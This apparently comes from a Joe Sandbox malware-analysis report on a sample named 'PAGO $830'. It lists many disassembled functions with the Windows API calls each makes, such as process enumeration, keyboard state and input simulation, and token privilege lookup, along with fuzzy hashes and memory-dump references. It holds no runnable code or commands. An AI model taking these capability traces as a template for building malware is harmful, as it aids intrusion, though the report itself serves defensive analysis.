                                                          • Opcode Fuzzy Hash: f122ffccaf7409e934f14669a76bc8f4fd06486360a9547e08729cd0bf66d63a
                                                          • Instruction Fuzzy Hash: E8410675A00314AFD7249F78C841BAABBE9EB89720F10452BF551DB282D7B5E94287B0
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DE56A1
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00DE56C7
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DE56EC
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DE5718
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 3fe2b2aa9e2dd4b7208186073fc3f183eda7627401626054b12d294e7497ad4e
                                                          • Instruction ID: 66dd94124b895d450f5d3414347eecf9cc2d56b7dec02c72388edd681aa93ffc
                                                          • Opcode Fuzzy Hash: 3fe2b2aa9e2dd4b7208186073fc3f183eda7627401626054b12d294e7497ad4e
                                                          • Instruction Fuzzy Hash: 34412B35600A10DFCB11EF15C444A19BBE2EF89724B18C488F94AAB362DB75FD41DBB1
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D96D01,00000000,00000000,00D98269,?,00D98269,?,00000001,00D96D01,8BE85006,00000001,00D98269,00D98269), ref: 00DAD8B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DAD939
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00DAD94B
                                                          • __freea.LIBCMT ref: 00DAD954
                                                            • Part of subcall function 00DA37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: bed6acfced50e7ecc2b1d1ce01da0e74dad5352d32183bad7850ac7aabb9f6e0
                                                          • Instruction ID: 4c383d758f63fd257edc79d3ab6ac6a0d3b7ce1bc13e21ff1518a5381344f6c8
                                                          • Opcode Fuzzy Hash: bed6acfced50e7ecc2b1d1ce01da0e74dad5352d32183bad7850ac7aabb9f6e0
                                                          • Instruction Fuzzy Hash: DF31AE72A0020AABDF248F65DC45EAF7BA6EB46710F184168FC09E7190EB35DD54CBB0
                                                          APIs
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E05287
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E052AA
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E052B7
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E052DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                          • String ID:
                                                          • API String ID: 3340791633-0
                                                          • Opcode ID: 87bf89df88f99a25d3b912ab6712f556a3186316fdb2cb762e4a0b1c65cd2d88
                                                          • Instruction ID: d316a4224d9cf64442b70703a20ad18b49f5b10dc8a7a31258eff91fece94e58
                                                          • Opcode Fuzzy Hash: 87bf89df88f99a25d3b912ab6712f556a3186316fdb2cb762e4a0b1c65cd2d88
                                                          • Instruction Fuzzy Hash: DD31F036A51A08BFEF309B54CC09BEA3775AF06754F586102FA11B62F0D375A9C49F41
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00DDAB0F
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DDAB2B
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00DDAB92
                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00DDABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                                          • Instruction ID: 1345925e749274abdc5cf53337ebccb59c6ae08338fff38fd5f2161a2fef5b08
                                                          • Opcode Fuzzy Hash: a84248dc6e17335f16b4e0df5d77cd90ad309fdfeeb83b96ff3453934c1158a9
                                                          • Instruction Fuzzy Hash: 85310830900218AEEF318B6DC815BFE7B6BAB45320F19C21BE491562D1C3798A878773
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 00E07569
                                                          • GetWindowRect.USER32(?,?), ref: 00E075DF
                                                          • PtInRect.USER32(?,?,00E08A7B), ref: 00E075EF
                                                          • MessageBeep.USER32(00000000), ref: 00E0765B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 07a4c52cfbd95b43bc9b4e779f40ec8b074f0ac561716221b09d6dd1fb72ca78
                                                          • Instruction ID: 44504038e1af5f904f35c375a80f99907b6636ddad3a47a8bcc7b25698d95a43
                                                          • Opcode Fuzzy Hash: 07a4c52cfbd95b43bc9b4e779f40ec8b074f0ac561716221b09d6dd1fb72ca78
                                                          • Instruction Fuzzy Hash: 6941AD34E04A15DFCB11CF5DE884EA977F1BB59304F1451A8E992AB2A1C732F9C6CB90
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00E0161E
                                                            • Part of subcall function 00DD3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD399F
                                                            • Part of subcall function 00DD3985: GetCurrentThreadId.KERNEL32 ref: 00DD39A6
                                                            • Part of subcall function 00DD3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD24F7), ref: 00DD39AD
                                                          • GetCaretPos.USER32(?), ref: 00E01632
                                                          • ClientToScreen.USER32(00000000,?), ref: 00E0167F
                                                          • GetForegroundWindow.USER32 ref: 00E01685
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 9aaa17b69d5ee6c5f4f135c5a65fd951146f5c58b4d72bc05b1673e228478241
                                                          • Instruction ID: b58a2d35c83fb4c8f862c5ab9f442799a843d413c1fe10e36249a662a8940c1a
                                                          • Opcode Fuzzy Hash: 9aaa17b69d5ee6c5f4f135c5a65fd951146f5c58b4d72bc05b1673e228478241
                                                          • Instruction Fuzzy Hash: 44312371D00209AFC704DFAAC8958AEB7F8EF88304B5484AAE415E7251EB319E45CBB1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD41F
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00DDD42D
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00DDD44D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DDD4FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 9059f39f8e3912c24448cd7553f6f679dd8d15782b94d53b35f42afa731b8ea1
                                                          • Instruction ID: 70f83155224bf9036d255273bd1f2025d4df1be970578aa1c26bc5b54e71982e
                                                          • Opcode Fuzzy Hash: 9059f39f8e3912c24448cd7553f6f679dd8d15782b94d53b35f42afa731b8ea1
                                                          • Instruction Fuzzy Hash: 1731D6311083009FC300EF50C885BAFBBF8EF89350F54452EF585961A1EB71A949CBB2
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • GetCursorPos.USER32(?), ref: 00E08EF3
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DC80CE,?,?,?,?,?), ref: 00E08F08
                                                          • GetCursorPos.USER32(?), ref: 00E08F50
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DC80CE,?,?,?), ref: 00E08F86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 1ceda0737c7c6656fccaa654e37c4f09916bed33f97e98250534fdb0bc920ec8
                                                          • Instruction ID: 960611c24db5ff2fc3e662f78af9236dc0fd25ed814b4df38b79608f9c051d60
                                                          • Opcode Fuzzy Hash: 1ceda0737c7c6656fccaa654e37c4f09916bed33f97e98250534fdb0bc920ec8
                                                          • Instruction Fuzzy Hash: ED21EF35200018AFDB258FA5CC58EEA7BBAEB4A310F140165F982A71E1C73199D1DB60
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00E0D034), ref: 00DDD219
                                                          • GetLastError.KERNEL32 ref: 00DDD228
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD237
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E0D034), ref: 00DDD294
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 87dabe0654eb5ec556da2a63a1d342d482696c404db43ba988d3fd06b627cba4
                                                          • Instruction ID: 84bb4333bbb8d74341e92e81930cd6584d4292cd063697125ddf5def010140cf
                                                          • Opcode Fuzzy Hash: 87dabe0654eb5ec556da2a63a1d342d482696c404db43ba988d3fd06b627cba4
                                                          • Instruction Fuzzy Hash: B321D6305093019F8B10DF24D88045A7BE8EF56364F14461AF499D73A1E730DD4ACB72
                                                          APIs
                                                            • Part of subcall function 00DD0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD0F6E
                                                            • Part of subcall function 00DD0F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F7A
                                                            • Part of subcall function 00DD0F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F89
                                                            • Part of subcall function 00DD0F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0F90
                                                            • Part of subcall function 00DD0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD0FA6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00DD1502
                                                          • _memcmp.LIBVCRUNTIME ref: 00DD1525
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD155B
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD1562
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: d2628bcc116e28cb002b4a978a75b1073a817f13dc43982fed458b7a07da25db
                                                          • Instruction ID: d8deb3cf4958c65d9bb8c4fac863512e1eb709abbcd18da3e6efdeb0e2abcf31
                                                          • Opcode Fuzzy Hash: d2628bcc116e28cb002b4a978a75b1073a817f13dc43982fed458b7a07da25db
                                                          • Instruction Fuzzy Hash: E5218C31E40209BFDF10DFA8D945BEEB7B8EF84300F18405AE456AB241E735EA49CB60
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E0273D
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02757
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E02765
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E02773
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 108a356fe187c6ab6aa9ac7a8466625c1c8edd86745caed3cdcbc3388e27a91c
                                                          • Instruction ID: 00bf6cb663e5e6b19627ebb95f749c9dbcf7a90982de7398e8e1c1b5ed04ce3e
                                                          • Opcode Fuzzy Hash: 108a356fe187c6ab6aa9ac7a8466625c1c8edd86745caed3cdcbc3388e27a91c
                                                          • Instruction Fuzzy Hash: E521D335205111AFD7149B24CC48FAA77D5EF85328F28925DF52AAB2D2C771FC82CBA1
                                                          APIs
                                                            • Part of subcall function 00DD8CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?), ref: 00DD8CE2
                                                            • Part of subcall function 00DD8CD3: lstrcpyW.KERNEL32(00000000,?,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD8D08
                                                            • Part of subcall function 00DD8CD3: lstrcmpiW.KERNEL32(00000000,?,00DD7860,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?), ref: 00DD8D39
                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD7879
                                                          • lstrcpyW.KERNEL32(00000000,?,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD789F
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DD86AA,00000000,?,0000001C,?,?,00000000), ref: 00DD78DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 29e102b4162d3a6f5c9a975a22561b737f5b521d474f8dc38d53fcac827ebf50
                                                          • Instruction ID: a1bd0c7c9fdc1fa381642dad65ee1e5646140be2b6a530a747276a3621ccbfb3
                                                          • Opcode Fuzzy Hash: 29e102b4162d3a6f5c9a975a22561b737f5b521d474f8dc38d53fcac827ebf50
                                                          • Instruction Fuzzy Hash: 0211033A200305AFCB156F39C849A7B77A9EF49750B54802BF902C7350FB329811E7B1
                                                          APIs
                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E055F0
                                                          • _wcslen.LIBCMT ref: 00E05602
                                                          • _wcslen.LIBCMT ref: 00E0560D
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E0574B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend_wcslen
                                                          • String ID:
                                                          • API String ID: 455545452-0
                                                          • Opcode ID: b2ba42ff56b8f9110084a03836d8321a516b091de21651cc7f0b8c590de1d5ed
                                                          • Instruction ID: 15630f10cd77749639ec4f9e6cd86b84d6cd4c894b0e28c5e98ee26ce0f5ebfe
                                                          • Opcode Fuzzy Hash: b2ba42ff56b8f9110084a03836d8321a516b091de21651cc7f0b8c590de1d5ed
                                                          • Instruction Fuzzy Hash: E011A27660060896DF209BA59C85AEB77ACEF11754B10A13AF905F60C1EB74C9C58F70
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00DD198B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD199D
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD19B3
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00DD19CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                                          • Instruction ID: 439aa6cfb4b04a8a44e5682db44e84aa1378dc02351acdf6f79e36c39e9639eb
                                                          • Opcode Fuzzy Hash: 6c2161b7046f55201632b397be991bff79a214b7cce4b41aea19fb47403144da
                                                          • Instruction Fuzzy Hash: 07113C3A900218FFEF109BA5CD95F9DBB78FB04754F200092E610B7290D6716E11DB94
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DDE11B
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00DDE14E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DDE164
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DDE16B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: 81bfebe57bdc0208b0a37e252594fbb5c51b91e6bc077445c15f81d03ef1fb42
                                                          • Instruction ID: 5e37ea792b094adf3287f8cae9387d00228a7068be09b5b2962936a5800c8cfc
                                                          • Opcode Fuzzy Hash: 81bfebe57bdc0208b0a37e252594fbb5c51b91e6bc077445c15f81d03ef1fb42
                                                          • Instruction Fuzzy Hash: C911C476B00219BFCB01AFA99C05A9F7BADAB45320F144296F915E7391D671894887B0
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,?,00D9CF89,00000000,00000004,00000000), ref: 00D9D1A8
                                                          • GetLastError.KERNEL32 ref: 00D9D1B4
                                                          • __dosmaperr.LIBCMT ref: 00D9D1BB
                                                          • ResumeThread.KERNEL32(00000000), ref: 00D9D1D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                          • String ID:
                                                          • API String ID: 173952441-0
                                                          APIs
